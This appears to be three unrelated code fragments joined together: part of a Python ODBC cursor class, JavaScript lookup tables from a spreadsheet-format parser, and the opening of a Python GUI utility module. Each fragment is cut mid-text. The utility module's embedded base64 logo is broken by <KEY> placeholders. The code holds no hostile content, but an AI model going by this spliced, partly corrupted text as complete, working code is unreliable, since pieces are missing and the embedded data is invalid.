else:
raw_value = ''.join(blocks)
if raw_value == None:
value_list.append(None)
else:
value_list.append(buf_cvt_func(raw_value))
col_num += 1
return self._row_type(value_list)
def _UpdateDesc(self):
"Get the information of (name, type_code, display_size, internal_size, col_precision, scale, null_ok)"
Cname = create_buffer(1024)
Cname_ptr = ctypes.c_short()
Ctype_code = ctypes.c_short()
Csize = ctypes.c_size_t()
Cdisp_size = ctypes.c_ssize_t(0)
CDecimalDigits = ctypes.c_short()
Cnull_ok = ctypes.c_short()
ColDescr = []
self._ColTypeCodeList = []
NOC = self._NumOfCols()
for col in range(1, NOC+1):
ret = ODBC_API.SQLColAttribute(self._stmt_h, col, SQL_DESC_DISPLAY_SIZE, ADDR(create_buffer(10)),
10, ADDR(ctypes.c_short()),ADDR(Cdisp_size))
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
ret = ODBC_API.SQLDescribeCol(self._stmt_h, col, Cname, len(Cname), ADDR(Cname_ptr),\
ADDR(Ctype_code),ADDR(Csize),ADDR(CDecimalDigits), ADDR(Cnull_ok))
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
col_name = Cname.value
if lowercase:
col_name = str.lower(col_name)
#(name, type_code, display_size,
# internal_size, col_precision, scale, null_ok)
ColDescr.append((col_name, SQL_data_type_dict.get(Ctype_code.value,(Ctype_code.value))[0],Cdisp_size.value,\
Csize.value, Csize.value,CDecimalDigits.value,Cnull_ok.value == 1 and True or False))
self._ColTypeCodeList.append(Ctype_code.value)
if len(ColDescr) > 0:
self.description = ColDescr
else:
self.description = None
self._CreateColBuf()
def _NumOfRows(self):
"""Get the number of rows"""
NOR = ctypes.c_ssize_t()
ret = ODBC_API.SQLRowCount(self._stmt_h, ADDR(NOR))
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self.rowcount = NOR.value
return self.rowcount
def _NumOfCols(self):
"""Get the number of cols"""
NOC = ctypes.c_short()
ret = ODBC_API.SQLNumResultCols(self._stmt_h, ADDR(NOC))
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
return NOC.value
def fetchall(self):
rows = []
while True:
row = self.fetchone()
if row == None:
break
rows.append(row)
return rows
def fetchmany(self, num = None):
if num == None:
num = self.arraysize
rows, row_num = [], 0
while row_num < num:
row = self.fetchone()
if row == None:
break
rows.append(row)
row_num += 1
return rows
def fetchone(self):
ret = SQLFetch(self._stmt_h)
if ret == SQL_SUCCESS:
return self._GetData()
else:
if ret == SQL_NO_DATA_FOUND:
return None
else:
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
def next(self):
row = self.fetchone()
if row == None:
raise(StopIteration)
return row
def __iter__(self):
return self
def skip(self, count = 0):
for i in xrange(count):
ret = ODBC_API.SQLFetchScroll(self._stmt_h, SQL_FETCH_NEXT, 0)
if ret != SQL_SUCCESS:
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
return None
def nextset(self):
ret = ODBC_API.SQLMoreResults(self._stmt_h)
if ret not in (SQL_SUCCESS, SQL_NO_DATA):
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
if ret == SQL_NO_DATA:
self._free_results('FREE_STATEMENT')
return False
else:
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return True
def _free_results(self, free_statement):
if not self.connection.connected:
raise ProgrammingError('HY000','Attempt to use a closed connection.')
self.description = None
if free_statement == 'FREE_STATEMENT':
ret = ODBC_API.SQLFreeStmt(self._stmt_h, SQL_CLOSE)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
else:
ret = ODBC_API.SQLFreeStmt(self._stmt_h, SQL_UNBIND)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
ret = ODBC_API.SQLFreeStmt(self._stmt_h, SQL_RESET_PARAMS)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self.rowcount = -1
def getTypeInfo(self, sqlType = None):
if sqlType == None:
type = SQL_ALL_TYPES
else:
type = sqlType
ret = ODBC_API.SQLGetTypeInfo(self._stmt_h, type)
if ret in (SQL_SUCCESS, SQL_SUCCESS_WITH_INFO):
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return self.fetchone()
def tables(self, table=None, catalog=None, schema=None, tableType=None):
"""Return a list with all tables"""
l_catalog = l_schema = l_table = l_tableType = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
if tableType != None:
l_tableType = len(tableType)
tableType = ctypes.c_char_p(tableType)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLTables(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table,
tableType, l_tableType)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def columns(self, table=None, catalog=None, schema=None, column=None):
"""Return a list with all columns"""
l_catalog = l_schema = l_table = l_column = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
if column != None:
l_column = len(column)
column = ctypes.c_char_p(column)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLColumns(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table,
column, l_column)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def primaryKeys(self, table=None, catalog=None, schema=None):
l_catalog = l_schema = l_table = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLPrimaryKeys(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def foreignKeys(self, table=None, catalog=None, schema=None, foreignTable=None, foreignCatalog=None, foreignSchema=None):
l_catalog = l_schema = l_table = l_foreignTable = l_foreignCatalog = l_foreignSchema = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
if foreignTable != None:
l_foreignTable = len(foreignTable)
foreignTable = ctypes.c_char_p(foreignTable)
if foreignCatalog != None:
l_foreignCatalog = len(foreignCatalog)
foreignCatalog = ctypes.c_char_p(foreignCatalog)
if foreignSchema != None:
l_foreignSchema = len(foreignSchema)
foreignSchema = ctypes.c_char_p(foreignSchema)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLForeignKeys(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table,
foreignCatalog, l_foreignCatalog,
foreignSchema, l_foreignSchema,
foreignTable, l_foreignTable)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def procedurecolumns(self, procedure=None, catalog=None, schema=None, column=None):
l_catalog = l_schema = l_procedure = l_column = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if procedure != None:
l_procedure = len(procedure)
procedure = ctypes.c_char_p(procedure)
if column != None:
l_column = len(column)
column = ctypes.c_char_p(column)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLProcedureColumns(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
procedure, l_procedure,
column, l_column)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
return (self)
def procedures(self, procedure=None, catalog=None, schema=None):
l_catalog = l_schema = l_procedure = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if procedure != None:
l_procedure = len(procedure)
procedure | |
*/
0x0089: 2, /* FWRITELN */
0x008A: 2, /* FWRITE */
0x008C: 1, /* DATEVALUE */
0x008D: 1, /* TIMEVALUE */
0x008E: 3, /* SLN */
0x008F: 4, /* SYD */
0x00A2: 1, /* CLEAN */
0x00A3: 1, /* MDETERM */
0x00A4: 1, /* MINVERSE */
0x00A5: 2, /* MMULT */
0x00AC: 1, /* WHILE */
0x00AF: 2, /* INITIATE */
0x00B0: 2, /* REQUEST */
0x00B1: 3, /* POKE */
0x00B2: 2, /* EXECUTE */
0x00B3: 1, /* TERMINATE */
0x00B8: 1, /* FACT */
0x00BD: 3, /* DPRODUCT */
0x00BE: 1, /* ISNONTEXT */
0x00C3: 3, /* DSTDEVP */
0x00C4: 3, /* DVARP */
0x00C6: 1, /* ISLOGICAL */
0x00C7: 3, /* DCOUNTA */
0x00C9: 1, /* UNREGISTER */
0x00CF: 4, /* REPLACEB */
0x00D2: 3, /* MIDB */
0x00D3: 1, /* LENB */
0x00D4: 2, /* ROUNDUP */
0x00D5: 2, /* ROUNDDOWN */
0x00D6: 1, /* ASC */
0x00D7: 1, /* DBCS */
0x00E5: 1, /* SINH */
0x00E6: 1, /* COSH */
0x00E7: 1, /* TANH */
0x00E8: 1, /* ASINH */
0x00E9: 1, /* ACOSH */
0x00EA: 1, /* ATANH */
0x00EB: 3, /* DGET */
0x00F4: 1, /* INFO */
0x00FC: 2, /* FREQUENCY */
0x0101: 1, /* EVALUATE */
0x0105: 1, /* ERROR.TYPE */
0x010F: 1, /* GAMMALN */
0x0111: 4, /* BINOMDIST */
0x0112: 2, /* CHIDIST */
0x0113: 2, /* CHIINV */
0x0114: 2, /* COMBIN */
0x0115: 3, /* CONFIDENCE */
0x0116: 3, /* CRITBINOM */
0x0117: 1, /* EVEN */
0x0118: 3, /* EXPONDIST */
0x0119: 3, /* FDIST */
0x011A: 3, /* FINV */
0x011B: 1, /* FISHER */
0x011C: 1, /* FISHERINV */
0x011D: 2, /* FLOOR */
0x011E: 4, /* GAMMADIST */
0x011F: 3, /* GAMMAINV */
0x0120: 2, /* CEILING */
0x0121: 4, /* HYPGEOMDIST */
0x0122: 3, /* LOGNORMDIST */
0x0123: 3, /* LOGINV */
0x0124: 3, /* NEGBINOMDIST */
0x0125: 4, /* NORMDIST */
0x0126: 1, /* NORMSDIST */
0x0127: 3, /* NORMINV */
0x0128: 1, /* NORMSINV */
0x0129: 3, /* STANDARDIZE */
0x012A: 1, /* ODD */
0x012B: 2, /* PERMUT */
0x012C: 3, /* POISSON */
0x012D: 3, /* TDIST */
0x012E: 4, /* WEIBULL */
0x012F: 2, /* SUMXMY2 */
0x0130: 2, /* SUMX2MY2 */
0x0131: 2, /* SUMX2PY2 */
0x0132: 2, /* CHITEST */
0x0133: 2, /* CORREL */
0x0134: 2, /* COVAR */
0x0135: 3, /* FORECAST */
0x0136: 2, /* FTEST */
0x0137: 2, /* INTERCEPT */
0x0138: 2, /* PEARSON */
0x0139: 2, /* RSQ */
0x013A: 2, /* STEYX */
0x013B: 2, /* SLOPE */
0x013C: 4, /* TTEST */
0x0145: 2, /* LARGE */
0x0146: 2, /* SMALL */
0x0147: 2, /* QUARTILE */
0x0148: 2, /* PERCENTILE */
0x014B: 2, /* TRIMMEAN */
0x014C: 2, /* TINV */
0x0151: 2, /* POWER */
0x0156: 1, /* RADIANS */
0x0157: 1, /* DEGREES */
0x015A: 2, /* COUNTIF */
0x015B: 1, /* COUNTBLANK */
0x015E: 4, /* ISPMT */
0x015F: 3, /* DATEDIF */
0x0160: 1, /* DATESTRING */
0x0161: 2, /* NUMBERSTRING */
0x0168: 1, /* PHONETIC */
0x0170: 1, /* BAHTTEXT */
0x0171: 1, /* THAIDAYOFWEEK */
0x0172: 1, /* THAIDIGIT */
0x0173: 1, /* THAIMONTHOFYEAR */
0x0174: 1, /* THAINUMSOUND */
0x0175: 1, /* THAINUMSTRING */
0x0176: 1, /* THAISTRINGLENGTH */
0x0177: 1, /* ISTHAIDIGIT */
0x0178: 1, /* ROUNDBAHTDOWN */
0x0179: 1, /* ROUNDBAHTUP */
0x017A: 1, /* THAIYEAR */
0xFFFF: 0
};
/* [MS-XLSX] 2.2.3 Functions */
var XLSXFutureFunctions = {
"_xlfn.ACOT": "ACOT",
"_xlfn.ACOTH": "ACOTH",
"_xlfn.AGGREGATE": "AGGREGATE",
"_xlfn.ARABIC": "ARABIC",
"_xlfn.AVERAGEIF": "AVERAGEIF",
"_xlfn.AVERAGEIFS": "AVERAGEIFS",
"_xlfn.BASE": "BASE",
"_xlfn.BETA.DIST": "BETA.DIST",
"_xlfn.BETA.INV": "BETA.INV",
"_xlfn.BINOM.DIST": "BINOM.DIST",
"_xlfn.BINOM.DIST.RANGE": "BINOM.DIST.RANGE",
"_xlfn.BINOM.INV": "BINOM.INV",
"_xlfn.BITAND": "BITAND",
"_xlfn.BITLSHIFT": "BITLSHIFT",
"_xlfn.BITOR": "BITOR",
"_xlfn.BITRSHIFT": "BITRSHIFT",
"_xlfn.BITXOR": "BITXOR",
"_xlfn.CEILING.MATH": "CEILING.MATH",
"_xlfn.CEILING.PRECISE": "CEILING.PRECISE",
"_xlfn.CHISQ.DIST": "CHISQ.DIST",
"_xlfn.CHISQ.DIST.RT": "CHISQ.DIST.RT",
"_xlfn.CHISQ.INV": "CHISQ.INV",
"_xlfn.CHISQ.INV.RT": "CHISQ.INV.RT",
"_xlfn.CHISQ.TEST": "CHISQ.TEST",
"_xlfn.COMBINA": "COMBINA",
"_xlfn.CONFIDENCE.NORM": "CONFIDENCE.NORM",
"_xlfn.CONFIDENCE.T": "CONFIDENCE.T",
"_xlfn.COT": "COT",
"_xlfn.COTH": "COTH",
"_xlfn.COUNTIFS": "COUNTIFS",
"_xlfn.COVARIANCE.P": "COVARIANCE.P",
"_xlfn.COVARIANCE.S": "COVARIANCE.S",
"_xlfn.CSC": "CSC",
"_xlfn.CSCH": "CSCH",
"_xlfn.DAYS": "DAYS",
"_xlfn.DECIMAL": "DECIMAL",
"_xlfn.ECMA.CEILING": "ECMA.CEILING",
"_xlfn.ERF.PRECISE": "ERF.PRECISE",
"_xlfn.ERFC.PRECISE": "ERFC.PRECISE",
"_xlfn.EXPON.DIST": "EXPON.DIST",
"_xlfn.F.DIST": "F.DIST",
"_xlfn.F.DIST.RT": "F.DIST.RT",
"_xlfn.F.INV": "F.INV",
"_xlfn.F.INV.RT": "F.INV.RT",
"_xlfn.F.TEST": "F.TEST",
"_xlfn.FILTERXML": "FILTERXML",
"_xlfn.FLOOR.MATH": "FLOOR.MATH",
"_xlfn.FLOOR.PRECISE": "FLOOR.PRECISE",
"_xlfn.FORMULATEXT": "FORMULATEXT",
"_xlfn.GAMMA": "GAMMA",
"_xlfn.GAMMA.DIST": "GAMMA.DIST",
"_xlfn.GAMMA.INV": "GAMMA.INV",
"_xlfn.GAMMALN.PRECISE": "GAMMALN.PRECISE",
"_xlfn.GAUSS": "GAUSS",
"_xlfn.HYPGEOM.DIST": "HYPGEOM.DIST",
"_xlfn.IFNA": "IFNA",
"_xlfn.IFERROR": "IFERROR",
"_xlfn.IMCOSH": "IMCOSH",
"_xlfn.IMCOT": "IMCOT",
"_xlfn.IMCSC": "IMCSC",
"_xlfn.IMCSCH": "IMCSCH",
"_xlfn.IMSEC": "IMSEC",
"_xlfn.IMSECH": "IMSECH",
"_xlfn.IMSINH": "IMSINH",
"_xlfn.IMTAN": "IMTAN",
"_xlfn.ISFORMULA": "ISFORMULA",
"_xlfn.ISO.CEILING": "ISO.CEILING",
"_xlfn.ISOWEEKNUM": "ISOWEEKNUM",
"_xlfn.LOGNORM.DIST": "LOGNORM.DIST",
"_xlfn.LOGNORM.INV": "LOGNORM.INV",
"_xlfn.MODE.MULT": "MODE.MULT",
"_xlfn.MODE.SNGL": "MODE.SNGL",
"_xlfn.MUNIT": "MUNIT",
"_xlfn.NEGBINOM.DIST": "NEGBINOM.DIST",
"_xlfn.NETWORKDAYS.INTL": "NETWORKDAYS.INTL",
"_xlfn.NIGBINOM": "NIGBINOM",
"_xlfn.NORM.DIST": "NORM.DIST",
"_xlfn.NORM.INV": "NORM.INV",
"_xlfn.NORM.S.DIST": "NORM.S.DIST",
"_xlfn.NORM.S.INV": "NORM.S.INV",
"_xlfn.NUMBERVALUE": "NUMBERVALUE",
"_xlfn.PDURATION": "PDURATION",
"_xlfn.PERCENTILE.EXC": "PERCENTILE.EXC",
"_xlfn.PERCENTILE.INC": "PERCENTILE.INC",
"_xlfn.PERCENTRANK.EXC": "PERCENTRANK.EXC",
"_xlfn.PERCENTRANK.INC": "PERCENTRANK.INC",
"_xlfn.PERMUTATIONA": "PERMUTATIONA",
"_xlfn.PHI": "PHI",
"_xlfn.POISSON.DIST": "POISSON.DIST",
"_xlfn.QUARTILE.EXC": "QUARTILE.EXC",
"_xlfn.QUARTILE.INC": "QUARTILE.INC",
"_xlfn.QUERYSTRING": "QUERYSTRING",
"_xlfn.RANK.AVG": "RANK.AVG",
"_xlfn.RANK.EQ": "RANK.EQ",
"_xlfn.RRI": "RRI",
"_xlfn.SEC": "SEC",
"_xlfn.SECH": "SECH",
"_xlfn.SHEET": "SHEET",
"_xlfn.SHEETS": "SHEETS",
"_xlfn.SKEW.P": "SKEW.P",
"_xlfn.STDEV.P": "STDEV.P",
"_xlfn.STDEV.S": "STDEV.S",
"_xlfn.SUMIFS": "SUMIFS",
"_xlfn.T.DIST": "T.DIST",
"_xlfn.T.DIST.2T": "T.DIST.2T",
"_xlfn.T.DIST.RT": "T.DIST.RT",
"_xlfn.T.INV": "T.INV",
"_xlfn.T.INV.2T": "T.INV.2T",
"_xlfn.T.TEST": "T.TEST",
"_xlfn.UNICHAR": "UNICHAR",
"_xlfn.UNICODE": "UNICODE",
"_xlfn.VAR.P": "VAR.P",
"_xlfn.VAR.S": "VAR.S",
"_xlfn.WEBSERVICE": "WEBSERVICE",
"_xlfn.WEIBULL.DIST": "WEIBULL.DIST",
"_xlfn.WORKDAY.INTL": "WORKDAY.INTL",
"_xlfn.XOR": "XOR",
"_xlfn.Z.TEST": "Z.TEST"
};
var RecordEnum = {
0x0006: { n:"Formula", f:parse_Formula },
0x000a: { n:'EOF', f:parse_EOF },
0x000c: { n:"CalcCount", f:parse_CalcCount },
0x000d: { n:"CalcMode", f:parse_CalcMode },
0x000e: { n:"CalcPrecision", f:parse_CalcPrecision },
0x000f: { n:"CalcRefMode", f:parse_CalcRefMode },
0x0010: { n:"CalcDelta", f:parse_CalcDelta },
0x0011: { n:"CalcIter", f:parse_CalcIter },
0x0012: { n:"Protect", f:parse_Protect },
0x0013: { n:"Password", f:parse_Password },
0x0014: { n:"Header", f:parse_Header },
0x0015: { n:"Footer", f:parse_Footer },
0x0017: { n:"ExternSheet", f:parse_ExternSheet },
0x0018: { n:"Lbl", f:parse_Lbl },
0x0019: { n:"WinProtect", f:parse_WinProtect },
0x001a: { n:"VerticalPageBreaks", f:parse_VerticalPageBreaks },
0x001b: { n:"HorizontalPageBreaks", f:parse_HorizontalPageBreaks },
0x001c: { n:"Note", f:parse_Note },
0x001d: { n:"Selection", f:parse_Selection },
0x0022: { n:"Date1904", f:parse_Date1904 },
0x0023: { n:"ExternName", f:parse_ExternName },
0x0026: { n:"LeftMargin", f:parse_LeftMargin },
0x0027: { n:"RightMargin", f:parse_RightMargin },
0x0028: { n:"TopMargin", f:parse_TopMargin },
0x0029: { n:"BottomMargin", f:parse_BottomMargin },
0x002a: { n:"PrintRowCol", f:parse_PrintRowCol },
0x002b: { n:"PrintGrid", f:parse_PrintGrid },
0x002f: { n:"FilePass", f:parse_FilePass },
0x0031: { n:"Font", f:parse_Font },
0x0033: { n:"PrintSize", f:parse_PrintSize },
0x003c: { n:"Continue", f:parse_Continue },
0x003d: { n:"Window1", f:parse_Window1 },
0x0040: { n:"Backup", f:parse_Backup },
0x0041: { n:"Pane", f:parse_Pane },
0x0042: { n:'CodePage', f:parse_CodePage },
0x004d: { n:"Pls", f:parse_Pls },
0x0050: { n:"DCon", f:parse_DCon },
0x0051: { n:"DConRef", f:parse_DConRef },
0x0052: { n:"DConName", f:parse_DConName },
0x0055: { n:"DefColWidth", f:parse_DefColWidth },
0x0059: { n:"XCT", f:parse_XCT },
0x005a: { n:"CRN", f:parse_CRN },
0x005b: { n:"FileSharing", f:parse_FileSharing },
0x005c: { n:'WriteAccess', f:parse_WriteAccess },
0x005d: { n:"Obj", f:parse_Obj },
0x005e: { n:"Uncalced", f:parse_Uncalced },
0x005f: { n:"CalcSaveRecalc", f:parse_CalcSaveRecalc },
0x0060: { n:"Template", f:parse_Template },
0x0061: { n:"Intl", f:parse_Intl },
0x0063: { n:"ObjProtect", f:parse_ObjProtect },
0x007d: { n:"ColInfo", f:parse_ColInfo },
0x0080: { n:"Guts", f:parse_Guts },
0x0081: { n:"WsBool", f:parse_WsBool },
0x0082: { n:"GridSet", f:parse_GridSet },
0x0083: { n:"HCenter", f:parse_HCenter },
0x0084: { n:"VCenter", f:parse_VCenter },
0x0085: { n:'BoundSheet8', f:parse_BoundSheet8 },
0x0086: { n:"WriteProtect", f:parse_WriteProtect },
0x008c: { n:"Country", f:parse_Country },
0x008d: { n:"HideObj", f:parse_HideObj },
0x0090: { n:"Sort", f:parse_Sort },
0x0092: { n:"Palette", f:parse_Palette },
0x0097: { n:"Sync", f:parse_Sync },
0x0098: { n:"LPr", f:parse_LPr },
0x0099: { n:"DxGCol", f:parse_DxGCol },
0x009a: { n:"FnGroupName", f:parse_FnGroupName },
0x009b: { n:"FilterMode", f:parse_FilterMode },
0x009c: { n:"BuiltInFnGroupCount", f:parse_BuiltInFnGroupCount },
0x009d: { n:"AutoFilterInfo", f:parse_AutoFilterInfo },
0x009e: { n:"AutoFilter", f:parse_AutoFilter },
0x00a0: { n:"Scl", f:parse_Scl },
0x00a1: { n:"Setup", f:parse_Setup },
0x00ae: { n:"ScenMan", f:parse_ScenMan },
0x00af: { n:"SCENARIO", f:parse_SCENARIO },
0x00b0: { n:"SxView", f:parse_SxView },
0x00b1: { n:"Sxvd", f:parse_Sxvd },
0x00b2: { n:"SXVI", f:parse_SXVI },
0x00b4: { n:"SxIvd", f:parse_SxIvd },
0x00b5: { n:"SXLI", f:parse_SXLI },
0x00b6: { n:"SXPI", f:parse_SXPI },
0x00b8: { n:"DocRoute", f:parse_DocRoute },
0x00b9: { n:"RecipName", f:parse_RecipName },
0x00bd: { n:"MulRk", f:parse_MulRk },
0x00be: { n:"MulBlank", f:parse_MulBlank },
0x00c1: { n:'Mms', f:parse_Mms },
0x00c5: { n:"SXDI", f:parse_SXDI },
0x00c6: { n:"SXDB", f:parse_SXDB },
0x00c7: { n:"SXFDB", f:parse_SXFDB },
0x00c8: { n:"SXDBB", f:parse_SXDBB },
0x00c9: { n:"SXNum", f:parse_SXNum },
0x00ca: { n:"SxBool", f:parse_SxBool },
0x00cb: { n:"SxErr", f:parse_SxErr },
0x00cc: { n:"SXInt", f:parse_SXInt },
0x00cd: { n:"SXString", f:parse_SXString },
0x00ce: { n:"SXDtr", f:parse_SXDtr },
0x00cf: { n:"SxNil", f:parse_SxNil },
0x00d0: { n:"SXTbl", f:parse_SXTbl },
0x00d1: { n:"SXTBRGIITM", f:parse_SXTBRGIITM },
0x00d2: { n:"SxTbpg", f:parse_SxTbpg },
0x00d3: { n:"ObProj", f:parse_ObProj },
0x00d5: { n:"SXStreamID", f:parse_SXStreamID },
0x00d7: { n:"DBCell", f:parse_DBCell },
0x00d8: { n:"SXRng", f:parse_SXRng },
0x00d9: { n:"SxIsxoper", f:parse_SxIsxoper },
0x00da: { n:"BookBool", f:parse_BookBool },
0x00dc: { n:"DbOrParamQry", f:parse_DbOrParamQry },
0x00dd: { n:"ScenarioProtect", f:parse_ScenarioProtect },
0x00de: { n:"OleObjectSize", f:parse_OleObjectSize },
0x00e0: { n:"XF", f:parse_XF },
0x00e1: { n:'InterfaceHdr', f:parse_InterfaceHdr },
0x00e2: { n:'InterfaceEnd', f:parse_InterfaceEnd },
0x00e3: { n:"SXVS", f:parse_SXVS },
0x00e5: { n:"MergeCells", f:parse_MergeCells },
0x00e9: { n:"BkHim", f:parse_BkHim },
0x00eb: { n:"MsoDrawingGroup", f:parse_MsoDrawingGroup },
0x00ec: { n:"MsoDrawing", f:parse_MsoDrawing },
0x00ed: { n:"MsoDrawingSelection", f:parse_MsoDrawingSelection },
0x00ef: { n:"PhoneticInfo", f:parse_PhoneticInfo },
0x00f0: { n:"SxRule", f:parse_SxRule },
0x00f1: { n:"SXEx", f:parse_SXEx },
0x00f2: { n:"SxFilt", f:parse_SxFilt },
0x00f4: { n:"SxDXF", f:parse_SxDXF },
0x00f5: { n:"SxItm", f:parse_SxItm },
0x00f6: { n:"SxName", f:parse_SxName },
0x00f7: { n:"SxSelect", f:parse_SxSelect },
0x00f8: { n:"SXPair", f:parse_SXPair },
0x00f9: { n:"SxFmla", f:parse_SxFmla },
0x00fb: { n:"SxFormat", f:parse_SxFormat },
0x00fc: { n:"SST", f:parse_SST },
0x00fd: { n:"LabelSst", f:parse_LabelSst },
0x00ff: { n:"ExtSST", f:parse_ExtSST },
0x0100: { n:"SXVDEx", f:parse_SXVDEx },
0x0103: { n:"SXFormula", f:parse_SXFormula },
0x0122: { n:"SXDBEx", f:parse_SXDBEx },
0x0137: { n:"RRDInsDel", f:parse_RRDInsDel },
0x0138: { n:"RRDHead", f:parse_RRDHead },
0x013b: { n:"RRDChgCell", f:parse_RRDChgCell },
0x013d: { n:"RRTabId", f:parse_RRTabId },
0x013e: { n:"RRDRenSheet", f:parse_RRDRenSheet },
0x013f: { n:"RRSort", f:parse_RRSort },
0x0140: { n:"RRDMove", f:parse_RRDMove },
0x014a: { n:"RRFormat", f:parse_RRFormat },
0x014b: { n:"RRAutoFmt", f:parse_RRAutoFmt },
0x014d: { n:"RRInsertSh", f:parse_RRInsertSh },
0x014e: { n:"RRDMoveBegin", f:parse_RRDMoveBegin },
0x014f: { n:"RRDMoveEnd", f:parse_RRDMoveEnd },
0x0150: { n:"RRDInsDelBegin", f:parse_RRDInsDelBegin },
0x0151: { n:"RRDInsDelEnd", f:parse_RRDInsDelEnd },
0x0152: { n:"RRDConflict", f:parse_RRDConflict },
0x0153: { n:"RRDDefName", f:parse_RRDDefName },
0x0154: { n:"RRDRstEtxp", f:parse_RRDRstEtxp },
0x015f: { n:"LRng", f:parse_LRng },
0x0160: { n:"UsesELFs", f:parse_UsesELFs },
0x0161: { n:"DSF", f:parse_DSF },
0x0191: { n:"CUsr", f:parse_CUsr },
0x0192: { n:"CbUsr", f:parse_CbUsr },
0x0193: { n:"UsrInfo", f:parse_UsrInfo },
0x0194: { n:"UsrExcl", f:parse_UsrExcl },
0x0195: { n:"FileLock", f:parse_FileLock },
0x0196: { n:"RRDInfo", f:parse_RRDInfo },
0x0197: { n:"BCUsrs", f:parse_BCUsrs },
0x0198: { n:"UsrChk", f:parse_UsrChk },
0x01a9: { n:"UserBView", f:parse_UserBView },
0x01aa: { n:"UserSViewBegin", f:parse_UserSViewBegin },
0x01ab: { n:"UserSViewEnd", f:parse_UserSViewEnd },
0x01ac: { n:"RRDUserView", f:parse_RRDUserView },
0x01ad: { n:"Qsi", f:parse_Qsi },
0x01ae: { n:"SupBook", f:parse_SupBook },
0x01af: { n:"Prot4Rev", f:parse_Prot4Rev },
0x01b0: { n:"CondFmt", f:parse_CondFmt },
0x01b1: { n:"CF", f:parse_CF },
0x01b2: { n:"DVal", f:parse_DVal },
0x01b5: { n:"DConBin", f:parse_DConBin },
0x01b6: { n:"TxO", | |
# -*- coding: utf-8 -*-
"""Provides utility functions, classes, and constants.
Useful functions are put here in order to prevent circular importing
within the other files.
The functions contained within this module ease the use of user-interfaces,
selecting options for opening files, and working with Excel.
@author: <NAME>
Created on Jul 15, 2020
Attributes
----------
PROCEED_COLOR : tuple(str, str)
The button color for all buttons that proceed to the next window.
The default is ('white', '#00A949'), where '#00A949' is a bright green.
"""
import importlib
import functools
import operator
import os
from pathlib import Path
import textwrap
import numpy as np
import pandas as pd
import PySimpleGUI as sg
try:
import ctypes
except ImportError:
ctypes = None
PROCEED_COLOR = ('white', '#00A949')
# the btyes representation of a png file used for the logo
_LOGO = (
b'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAAAAlwSFlz'
b'AA<KEY>'
b'<KEY>'
b'phOnTTLNaJva0am1nTqTTHR8xFSNhuADlcSJFXFRNCby2mWXx77u6/QPYAOLxDAhfH/d/X2/x/c7'
b'<KEY>/O1VrLHApWnhEAlebojd2tWKOHJ5feGvVjNJuWma3N0rB498'
b'hLbDnfgW6DKeLmEdC4soaxJpuL1L6jvyKe6eaAcAhnVtWaOf8+YRrfezm1rHsZ+RlKo/Equ7AgwL'
b'AKAxf1jrOvFn6dLGbfriXbWMvfJ3xFwwczg5jXzdpXYe3yY3PbN3TOHZO0qJo+YNYimuBOGZYbsW'
b'6+rTes7vl8//eAtLbPNnss6VG6BGGJJcWsfwVrvmv7AboeYPqNynI8ZcFzHNWkiMeYVs+k9eplok'
b'<KEY>'
b'<KEY>'
b'<KEY>
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'+<KEY>'
b'<KEY>'
b'<KEY>'
